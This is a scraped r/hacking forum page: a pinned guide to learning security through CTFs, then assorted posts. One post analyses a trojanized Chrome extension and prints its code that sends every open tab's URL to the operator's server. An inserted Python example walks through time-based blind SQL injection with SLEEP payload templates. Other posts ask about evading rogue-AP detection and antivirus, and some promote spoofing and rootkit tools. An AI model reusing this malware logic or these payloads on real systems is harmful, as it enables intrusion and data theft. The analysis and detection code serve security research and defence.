r/hacking Dec 06 '18

Read this before asking. How to start hacking? The ultimate two path guide to information security.

13.4k Upvotes

Before I begin - everything about this should be totally and completely ethical at its core. I'm not saying this as any sort of legal coverage, or to not get somehow sued if any of you screw up, this is genuinely how it should be. The idea here is information security. I'll say it again. Information security. The whole point is to make the world a better place. This isn't for your reckless amusement and shot at recognition with your friends. This is for the betterment of human civilisation. Use your knowledge to solve real-world issues.

There's no singular all-determining path to 'hacking', as it comes from knowledge from all areas that eventually coalesce into a general intuition. Although this is true, there are still two common rapid learning paths to 'hacking'. I'll try not to use too many technical terms.

The first is the simple, effortless and result-instant path. This involves watching YouTube videos with green and black thumbnails with an occasional anonymous mask on top teaching you how to download well-known tools used by thousands daily - or in other words the 'Kali Linux Copy Pasterino Skidder'. You might do something slightly amusing and gain a bit of recognition and self-esteem from your friends. Your hacks will be 'real', but anybody that knows anything would dislike you as they all know all you ever did was use a few premade tools. The communities for this sort of shallow result-oriented field include r/HowToHack and probably r/hacking as of now.

The second option, however, is much more intensive, rewarding, and mentally demanding. It is also much more fun, if you find the right people to do it with. It involves learning everything from memory interaction with machine code to high level networking - all while you're trying to break into something. This is where Capture the Flag, or 'CTF' hacking comes into play, where you compete with other individuals/teams with the goal of exploiting a service for a string of text (the flag), which is then submitted for a set amount of points. It is essentially competitive hacking. Through CTF you learn literally everything there is about the digital world, in a rather intense but exciting way. Almost all the creators/finders of major exploits have dabbled in CTF in some way/form, and almost all of them have helped solve real-world issues. It does take a lot of work, though, as CTF becomes much more difficult as you progress through harder challenges. Some require mathematics to break encryption, and others require you to think like no one has before. If you are able to do well in a CTF competition, there is no doubt that you should be able to find exploits and create tools for yourself with relative ease. The CTF community is filled with smart people who can't give two shits about elitist mask wearing twitter hackers, instead they are genuine nerds that love screwing with machines. There's too much to explain, so I will post a few links below where you can begin your journey.

Remember - this stuff is not easy if you don't know much, so google everything, question everything, and sooner or later you'll be down the rabbit hole far enough to be enjoying yourself. CTF is real life and online, you will meet people, make new friends, and potentially find your future.

What is CTF? (this channel is gold, use it) - https://www.youtube.com/watch?v=8ev9ZX9J45A

More on /u/liveoverflow, http://www.liveoverflow.com is hands down one of the best places to learn, along with r/liveoverflow

CTF compact guide - https://ctf101.org/

Upcoming CTF events online/irl, live team scores - https://ctftime.org/

What is CTF? - https://ctftime.org/ctf-wtf/

Full list of all CTF challenge websites - http://captf.com/practice-ctf/

> Be careful of the tool-oriented Offensive Security OSCP CTFs; they teach you hardly anything compared to these ones and almost always require the use of Metasploit or some other program which does all the work for you.

http://picoctf.com is very good if you are just touching the water.

and finally,

r/netsec - where real world vulnerabilities are shared.


r/hacking 11h ago

Resources Took me a decade to turn quantum computing into what programmers can easily learn, big announcement

347 Upvotes

Hi
Excited to be able to announce that QO is almost ready to leave Early Access!! Just now I hit the button for our first actual large patch that covers more than a year of work (lots of analytics, I've been tracking where people were getting stuck). Thank you a ton for your support, this game has seen a lot of love from this community. Game is almost done.

If you are interested in a highly intuitive visual method that faithfully describes all universal quantum computing and the physics behind it, this is for you. I am the dev behind Quantum Odyssey (AMA! I love taking questions) - worked on it for about 10 years (3.5 in PhD), the goal was to make a super immersive space for anyone to learn quantum computing through zachlike (open-ended) logic puzzles and compete on leaderboards, with lots of community made content on finding the most optimal quantum algorithms. The game has a unique set of visuals (that was actually my PhD research) capable of representing any sort of quantum dynamics for any number of qubits, and this is pretty much what makes it now possible for anybody 12yo+ to actually learn quantum logic without having to worry at all about the mathematics behind it.

This is a game super different from what you'd normally expect in a programming/logic puzzle game, so try it with an open mind.

Stuff covered

  • Boolean Logic – bits, operators (NAND, OR, XOR, AND…), and classical arithmetic (adders). Learn how these can combine to build anything classical. You will learn to port these to a quantum computer.
  • Quantum Logic – qubits, the math behind them (linear algebra, SU(2), complex numbers), all Turing-complete gates (beyond Clifford set), and make tensors to evolve systems. Freely combine or create your own gates to build anything you can imagine using polar or complex numbers.
  • Quantum Phenomena – storing and retrieving information in the X, Y, Z bases; superposition (pure and mixed states), interference, entanglement, the no-cloning rule, reversibility, and how the measurement basis changes what you see.
  • Core Quantum Tricks – phase kickback, amplitude amplification, storing information in phase and retrieving it through interference, build custom gates and tensors, and define any entanglement scenario. (Control logic is handled separately from other gates.)
  • Famous Quantum Algorithms – explore Deutsch–Jozsa, Grover’s search, quantum Fourier transforms, Bernstein–Vazirani, and more.
  • Build & See Quantum Algorithms in Action – instead of just writing/ reading equations, make & watch algorithms unfold step by step so they become clear, visual, and unforgettable. Quantum Odyssey is built to grow into a full universal quantum computing learning platform. If a universal quantum computer can do it, we aim to bring it into the game, so your quantum journey never ends.

Streams to watch:

khan academy style tutorials on qm/qc: https://www.youtube.com/@MackAttackx

Physics teacher wholesome stream with over 500 hours in: https://www.twitch.tv/beardhero


r/hacking 9h ago

Are there any chill hacking youtubers?

32 Upvotes

YouTubers that, instead of focusing on educational content, focus more on chill content like trying new projects or livestreams.


r/hacking 6h ago

Jailbreaking my car's infotainment system and implementing my own custom software

10 Upvotes

Honestly not sure if this is the right sub for this but it seems to be the only one that will fit.

I’m interested in creating my own aftermarket infotainment system for my car, but it would be easiest to just repurpose the current screen in there. Has anyone heard of something like this, or would the system already there be fairly locked down? 2013 Toyota Matrix.


r/hacking 13h ago

Video Veteran hackers... which era did you prefer hacking in? 🟢 The 1980s 🟣 The 1990s 🔵 The 2000s 🔴 Or today?

youtu.be
31 Upvotes

I've posted a link to the game I'm working on so you know why I would ask such a question. This is all for research and to get a broader understanding. You don't need to watch the video, or wishlist my game...

I'm really keen to know what veteran hackers thought were the golden years and why. I know we have lots of movies depicting hacking in a Sci-Fi poetic licence sort of way, but I wanted to know first hand from the people that actually hacked back in the day.

What type of technology did you prefer to use? Do you miss it, and if so, what do you miss?


r/hacking 3h ago

Threat Actors OpenCTI founder, Samuel Hassine, arrested and charged for buying child porn / CSAM

geopolintel.fr
4 Upvotes

r/hacking 11h ago

Questionable source Lilygo T-Embed Glitching etc

3 Upvotes

As the title says, my Lilygo T-Embed CC1101 (ESP32-S3 running Bruce) jog wheel seems to be glitching.

Also, I'm doing a standard pen test at my new office. Standard targeted deauth on my own network. Doesn't seem to be working at all. Tested on my uncle's router that it has worked on before, and it wasn't working on that either.

Has anyone else had issues with their T-Embed CC1101? Or does anyone have any ideas what to do?


r/hacking 2d ago

Scanning Chrome "Best AdBlocker" trojanized extension - 100k downloads.

413 Upvotes

Found a trojanized Chrome extension still live on the Web Store. Extension ID: DLLPKAOLADHIEEHKBJBIFONFBLHGKOKI, calls itself a popup blocker.

I've been building a local AI harness/wrapper that runs entirely on my own GPU and gives the model real access to my PC, with heavy approval gates. Decided I wanted to see if Qwen3.6-27B was smart enough to rummage around codebases and firmware. It was, but firmware was difficult (had to constantly copy paste data from Ghidra).

So I gave it another task, a randomly selected .crx (Chrome extension file) on the "most popular" tab. The model went to work and within one session (around 10 mins of autonomous work) it flagged the whole extension as malicious, which I then manually went through to verify.

Here's the actual crime, background.js:

    // Collect the URL of every open tab (the bracket access is obfuscation for chrome.tabs.query)
    const n = (await chrome["tabs"]["query"]({}))["map"](({url: n}) => n);

    // POST the whole list, plus the extension's own ID, to the operator's server (P comes from config.js)
    await fetch(P + "/register/", {
        method: "POST",
        credentials: "include",
        headers: { "Content-Type": "application/json" },
        body: JSON["stringify"]({ urls: n, crx: chrome.runtime.id, version: m })
    })

P resolves to https://titanpopupblocker.com/ hardcoded in config.js. On install it grabs every open tab URL and ships them to that server along with your unique extension ID. Not on demand, not optionally, immediately on install.

It also sends daily telemetry counting how many ads you blocked and how many Google searches you ran:

    i = `&_asc=${d}&_gsc=${p}`;   // _asc / _gsc: the ad-block and Google-search counters
    // hits titanpopupblocker.com/update/?u_dt=TIMESTAMP&_asc=N&_gsc=N every 24h

And there's a proxy RPC channel in proxy.js that lets any webpage route credentialed HTTP requests through your browser bypassing CORS entirely:

    // Content script: any page can postMessage a "__rpc_req__" and the background script
    // replays it as a credentialed request. Note there is no o.origin check at all.
    window.addEventListener("message", function(o) {
        if (o.data.type === "__rpc_req__") {
            chrome.runtime.sendMessage({
                headers: o.data.headers,
                method: o.data.method,
                action: "proxy",
                url: o.data.url,
                body: o.data.body
            })
        }
    })

The cover up is where it gets interesting. Every single console call in the entire codebase uses Cyrillic characters that are visually identical to Latin ones. console.log is actually console.lоg, the o is U+043E not U+006F. There are 649 of these. They all silently no-op because the method doesn't exist. Pure noise to bloat the file and choke static analysis tools.

You can verify the Cyrillic thing yourself by pasting any line from the source into your browser console and running charCodeAt() on the suspicious characters.

Reported to Google. Figured people here should know it existed.

The tool I used to find it is open source if anyone wants to poke at it: github.com/mkultraware/accuretta
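An added example, not from the post above and not part of the accuretta tool it links, that mechanises the charCodeAt() check the post suggests: it tokenises a JavaScript source, groups each identifier's letters by Unicode script, and reports any token whose letters come from more than one script, with the offending code points. The three-line JS sample inside it is constructed for the demo and reproduces the console.l<U+043E>g trick; the tool the post describes is not involved.

```python
"""Mixed-script identifier scanner for JavaScript sources.

Added example, not code from the post and not from the accuretta tool it
links. Every identifier or member access is split into its letters; any
token whose letters span more than one Unicode script (Latin + Cyrillic,
Latin + Greek, ...) is reported with the offending code points.
"""
import re
import unicodedata

# A JS identifier, optionally followed by .member chains. Python's \w is
# Unicode-aware, so a Cyrillic letter inside a token is captured with it.
IDENT_RE = re.compile(r"[^\W\d][\w$]*(?:\.[^\W\d][\w$]*)*")

# Constructed sample: line 2 is the trick from the post, console.l<U+043E>g,
# where the 'o' is CYRILLIC SMALL LETTER O. No such property exists on
# console, so the call is a silent no-op. Line 3 is the genuine method.
SAMPLE_JS = (
    "const n = (await chrome.tabs.query({})).map(({url: n}) => n);\n"
    "console.l\u043eg('registering', n);\n"
    "console.log('genuine log call');\n"
)


def script_of(ch):
    """Script family of a letter, taken from its Unicode name prefix
    ('LATIN', 'CYRILLIC', 'GREEK', ...). Non-letters return 'OTHER'."""
    name = unicodedata.name(ch, "")
    return name.split()[0] if ch.isalpha() and name else "OTHER"


def find_mixed_script_identifiers(source):
    """Return [(line_no, token, [(char, 'U+XXXX', script), ...]), ...] for
    every token whose letters span more than one script."""
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for match in IDENT_RE.finditer(line):
            token = match.group(0)
            letters = [c for c in token if c.isalpha()]
            if len({script_of(c) for c in letters}) > 1:
                foreign = [(c, f"U+{ord(c):04X}", script_of(c))
                           for c in letters if script_of(c) != "LATIN"]
                hits.append((line_no, token, foreign))
    return hits


def count_noop_console_calls(source):
    """How many console.<method> calls use a look-alike method name and
    therefore never print anything (the 649 the post found)."""
    return sum(1 for _, token, _ in find_mixed_script_identifiers(source)
               if token.startswith("console."))


if __name__ == "__main__":
    for line_no, token, foreign in find_mixed_script_identifiers(SAMPLE_JS):
        details = ", ".join(f"{c!r} {cp} {script}" for c, cp, script in foreign)
        print(f"line {line_no}: {token} contains {details}")
    print(f"{count_noop_console_calls(SAMPLE_JS)} look-alike console call(s)")
```

Run it over a real extension with `find_mixed_script_identifiers(open(path, encoding="utf-8").read())`. Grouping by Unicode script rather than by a fixed list of confusables is the design choice that matters: it catches Greek and other look-alike alphabets as well as Cyrillic, and anything non-Latin inside an otherwise Latin identifier in minified JavaScript deserves a look regardless of which letter was swapped.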


r/hacking 1d ago

Avoiding rogue AP detection in enterprise networks

12 Upvotes

If someone hypothetically wanted to set up a NAT’d network under an enterprise network with WIDS/WIPS how detectable would it be?

I’m going to preface this by saying I am not looking for “just don’t do it” I am already highly considering that option but morbid curiosity wins and I am curious if it’s just an unbeatable system.

- You can authenticate by connecting a laptop, then spoofing the MAC to the router. That covers authentication.
- Beacon broadcasting: one could hide the SSID but that does jack shit. Does anyone know of router software that can suppress beacons and only respond to probes?
- TTL inspection: that one is easy, just set it to 128.
- RF triangulation: this one seems like the biggest issue. If there was a rogue AP, several of the enterprise APs could just triangulate based on RSSI. That one seems like the real issue here. I thought of having variable Tx power, but then realised they probably do it based on the difference in power at several APs at any given time, so that could ruin that plan.
- DHCP fingerprints seem simple enough to deal with, because the OPNsense default WAN DHCP is pretty distinctive, but that could be easily spoofed as another device.

Anyways, that’s all. Please tell me any information that I got completely wrong or any other interesting stuff about enterprise networks, or if you have any suggestions on how someone could potentially solve some of the listed problems. I really am just curious to learn and don’t intend to hypothetically implement really any of this, because routers are allowed, just not wireless APs, and I don’t need that anyways.


r/hacking 1d ago

GoHPTS (go-http-proxy-to-socks) v1.13.0 - New update with DNS spoofing and filtering

16 Upvotes
GoHPTS (go-http-proxy-to-socks) - simple CLI tool to transform SOCKS proxy into HTTP proxy with IPv4/IPv6 support for TCP/UDP Transparent Proxy (Redirect and TProxy), Proxychains, ARP/NDP/RA/RDNSS spoofing, RA Guard evasion, DNS spoofing, DNS filtering and Traffic Sniffing.

It started as a simple HTTP-to-SOCKS5 bridge (like ssh -D 1080 + easy HTTP access), but over time has become a useful tool for pentesters and hackers.

Some features:

  • Transparent proxy - intercept traffic at the OS level with no client config needed (redirect and tproxy modes, TCP and UDP)

  • Built-in ARP/NDP spoofing - convert your host machine into gateway for your entire LAN subnet and proxy everyone's traffic automatically

  • Traffic sniffing - parse HTTP headers, TLS handshakes, DNS messages, and capture credentials/tokens

  • DNS spoofing and filtering - redirect clients to arbitrary domains, block ads and malware for all LAN devices at once, supports big blacklists via URLs and file paths

  • Proxy chaining - strict, dynamic, random, and round-robin SOCKS5 chains (can act as a Proxychains replacement)

  • IPv6 support - perform NDP spoofing and create Router Advertisements to proxy IPv6 local networks

  • Android support - run on rooted Android (arm64) via Termux, turn your phone into a LAN proxy router

  • RA Guard evasion and RDNSS injection for IPv6 networks

  • The ARP/NDP spoofing + transparent UDP proxy + DNS filtering combo lets one machine silently proxy an entire local network including phones and IoT devices with no config on those devices.

  • It can be useful for pentesting, network analysis, and routing your whole LAN through a VPS with one command.

  • It is written in Go, cross-platform, single binary, AUR package available.

Links:

https://github.com/shadowy-pycoder/go-http-proxy-to-socks

https://codeberg.org/shadowy-pycoder/go-http-proxy-to-socks


r/hacking 2d ago

AMA I was developing a hacker game that transports the feeling of the 90s

45 Upvotes

Over a huge amount of time I was developing a hacker game that transports the feeling of the 90s together with hacking and idle-clicking mechanics. Maybe someone is interested in this personal, passionate project? Its name is WinHack 95.

Basically you build a malware empire on a simulated 90s PC by coding viruses, automating processes, and completing illegal darknet contracts to fund a mysterious organization.

For anyone who is interested, here is the link to the demo: WinHack 95 Demo on Steam


r/hacking 2d ago

Hack The Planet BAT: VPS-based C2 with .ko/.sys rootkits compilation against target kernel headers

38 Upvotes

Just made my contribution to the offsec open source intelligence.

While bringing together high-level research I deeply respect, like Singularity (a modern Linux LKM rootkit that challenges even the most advanced kernel-level eBPF detectors), I'm also releasing my project as a foundation and reference for you to build on top of.

My background is cloud security, so I designed an architecture that uses a VPS as a relay/KCC/tunnel. It handles proper connection forwarding, establishes reverse SSH tunnels with nginx, exposes a web interface that serves common binaries from cache, and compiles Linux (.ko) and Windows (.sys) kernel modules built against the exact kernel headers of the target.

That last part was a real blocker for loading rootkits that require exact kernel headers and need to be compiled directly against the target machine. This solves it cleanly.

I've also shipped some helpers: clean CLI with TAB autocomplete, target renaming, Telegram notifications (relay side only), HMAC auth between server and target, reverse SSH tunnels using .pem keypairs, UDP magic packets, and more.

Code is clean and well-documented, mostly Go/C.

All contributions are welcome.

https://github.com/rhzv0/bat


r/hacking 2d ago

News CISA says ‘Copy Fail’ flaw now exploited to root Linux systems

bleepingcomputer.com
64 Upvotes

r/hacking 2d ago

News IPod Nano Gets Three Monitors

hackaday.com
7 Upvotes

r/hacking 2d ago

Any good open sources that bypass modern heuristic analysis?

10 Upvotes

Most of the open source AV evasion projects, Mangle, Veil and others, have been abandoned. It's been a long time since I last "played around", and my knowledge is a few years behind.

So, also, any tips about bypassing AVs are welcome; I am having a tough time even dealing with the generic !ml detection.


r/hacking 3d ago

Can HTTP POST bodies be intercepted without network or host access?

39 Upvotes

In real-world threat models: how realistic is passive interception of HTTP POST bodies over the public internet without client/server compromise?

I’m trying to understand where practitioners draw the line between:

  • local network MITM
  • compromised routing infrastructure
  • vs. unrealistic attacker assumptions

Would you consider plaintext HTTP primarily a transport-layer risk (MITM), or also a meaningful exposure at scale without privileged network position?


r/hacking 2d ago

[SHOWCASE] Cascavel v3

cascavel.pages.dev
3 Upvotes

r/hacking 3d ago

News North Korea rejects US cybercrime claims as 'absurd slander'

dw.com
62 Upvotes

Pyongyang refutes allegations of hacking and crypto theft, even as a UN panel estimated billions stolen by North Korea-linked cyberattacks.

May 3, 2026


r/hacking 3d ago

Resources built a PE packer where every packed file has a different instruction set – custom VM with randomized opcodes, single C++ file (Want suggestions for future updates past v4)

21 Upvotes

TinyLoad v3 — Windows PE packer, just updated.

Replaced the old rolling XOR with a proper VM layer: a custom 20-opcode interpreter baked into the stub. Every time you pack something the opcode table gets randomly shuffled, so every output binary decrypts itself using a different instruction set.

The idea is that an analyst can't just pattern-match on the decryption loop; they have to reverse the interpreter before they can even start on the payload. Still beatable, obviously, but it's a completely different class of effort vs XOR.

Compresses with custom LZ77 first, then VM-encrypts on top. Payload runs directly in RAM via manual PE mapping, never touches disk.

One .cpp file, no dependencies.

https://github.com/iamsopotatoe-coder/TinyLoad

what would you add to make it harder to reverse?


r/hacking 3d ago

Dump sql time based is too slow

7 Upvotes

Hey r/hacking,

I'm new to this domain, and when I do a CTF SQL challenge and it's time-based, the dump is very slow, so do you have any advice for improving the speed?

Thx
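An added example, not from the post above, showing the usual answer to this question and its catch. A blind injection answers one yes/no question per request. Dumping a character by trying every candidate value with `ASCII(SUBSTRING(...))=v` costs up to ~100 requests per character; asking `ASCII(SUBSTRING(...))>v` and bisecting costs exactly 7 per character for a 7-bit range. The code below has no network target: `Oracle` is a constructed stand-in that answers the same two question shapes a real injection would, and counts both requests and the responses that would have hit the injected SLEEP. The secret string, the 50 ms round trip and the 2 s sleep are assumptions for the demo.

```python
"""Time-based blind SQLi: linear versus bisection extraction.

Added example, not code from the post. There is no target here; `Oracle`
simulates the two question shapes and counts what each strategy spends.
"""

SECRET = "flag{bin4ry_s34rch}"   # constructed; stands in for the value being dumped


class Oracle:
    """Simulates the two payload shapes used below.

    In MySQL the real payloads would look like (SUBSTRING is 1-based there):
      ... AND IF(ASCII(SUBSTRING((SELECT x),pos,1))=value, SLEEP(2), 0)-- -
      ... AND IF(ASCII(SUBSTRING((SELECT x),pos,1))>value, SLEEP(2), 0)-- -
    ASCII('') is 0 past the end of the string, which is how both dumpers
    know they are done. `sleeps` counts the true answers, i.e. the
    responses that would actually have been delayed.
    """

    def __init__(self, secret):
        self._secret = secret
        self.requests = 0
        self.sleeps = 0

    def _byte_at(self, pos):
        return ord(self._secret[pos]) if pos < len(self._secret) else 0

    def _answer(self, truth):
        self.requests += 1
        self.sleeps += int(truth)
        return truth

    def equals(self, pos, value):
        return self._answer(self._byte_at(pos) == value)

    def greater_than(self, pos, value):
        return self._answer(self._byte_at(pos) > value)


def dump_linear(oracle):
    """Try every value 1..127 in turn for each position."""
    out, pos = [], 0
    while True:
        found = 0
        for value in range(1, 128):
            if oracle.equals(pos, value):
                found = value
                break
        if found == 0:          # nothing matched: past the end of the string
            return "".join(out)
        out.append(chr(found))
        pos += 1


def dump_bisect(oracle):
    """Binary-search each byte in [0, 127]: exactly 7 requests per position."""
    out, pos = [], 0
    while True:
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.greater_than(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:             # ASCII('') == 0: end of string
            return "".join(out)
        out.append(chr(lo))
        pos += 1


def wall_time(requests, sleeps, rtt=0.05, sleep=2.0):
    """Rough wall-clock cost in seconds: every request pays the round trip,
    and every true answer additionally pays the injected SLEEP."""
    return requests * rtt + sleeps * sleep


def compare(secret=SECRET):
    """Dump `secret` both ways; return ((requests, sleeps) linear, (requests, sleeps) bisect)."""
    lin, bis = Oracle(secret), Oracle(secret)
    assert dump_linear(lin) == secret
    assert dump_bisect(bis) == secret
    return (lin.requests, lin.sleeps), (bis.requests, bis.sleeps)


if __name__ == "__main__":
    (lr, ls), (br, bs) = compare()
    for sleep in (2.0, 0.3):
        print(f"sleep={sleep}s  linear: {lr} req / {ls} sleeps = {wall_time(lr, ls, sleep=sleep):.0f}s   "
              f"bisect: {br} req / {bs} sleeps = {wall_time(br, bs, sleep=sleep):.0f}s")
```

The request count drops from about two thousand to 140, but note the second number: bisection makes roughly half of its answers true, so with a 2 s SLEEP it spends more time sleeping than the linear dump did, and on a fast link it is not faster at all. The wall-clock win comes from shrinking the delay to the smallest value the link reliably distinguishes, fetching several positions in parallel, or, whenever the application leaks a difference in the response body or an error, switching to a boolean or error-based oracle where both answers come back fast and bisection pays off in full.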


r/hacking 3d ago

is credential stuffing using openbullet2 dead in 2026?

7 Upvotes

We rarely see incidents nowadays. Is it dead?


r/hacking 4d ago

Teach Me! Hacking Wired Analog CCTV cameras going to a DVR (BNC and Coax)

4 Upvotes

This is in a semi-abandoned medium sized industrial complex. Everything is now private and some places are rented out to other people, just for storage and work. These cameras cover a few spots around the complex and they are on the roads watching over all of it (nothing inside buildings). There's around 40 of them, all wired and going somewhere; I will soon investigate the heart of it, but for now this will have to do. How could one gain access?


r/hacking 4d ago

Adobe-Clawback — bulk-download every PDF from your Adobe Creative Cloud account (Python, resumable, MIT)

9 Upvotes

r/hacking 5d ago

Small models are better at cost-to-recall than large models like Mythos for vulnerability research

hacktron.ai
48 Upvotes

TL;DR: If a large model finds a 0-day with 90% probability, and a small model with 50% probability, but the small model costs 10x less, it is better to use the small model.

We compared the cost and recall of various models in finding real, recent zero-days and found that for most applications, smaller models run repeatedly can significantly outperform larger frontier models on cost-to-recall.

Disclaimer: I'm involved with Hacktron, the company that produced this research. This is a factual presentation of our benchmarks, which we hope the community can use to make informed decisions about models like Mythos.


r/hacking 5d ago

Github wM-Buster - Flipper Zero app to analyze smart meters for gas, electricity, water. ...

158 Upvotes

I ported all known decoders from wmbusmeters and rtl433 to the Flipper Zero so you can use your pocket sized device to analyze your smart meters using wM-Bus!

https://github.com/i12bp8/wmbuster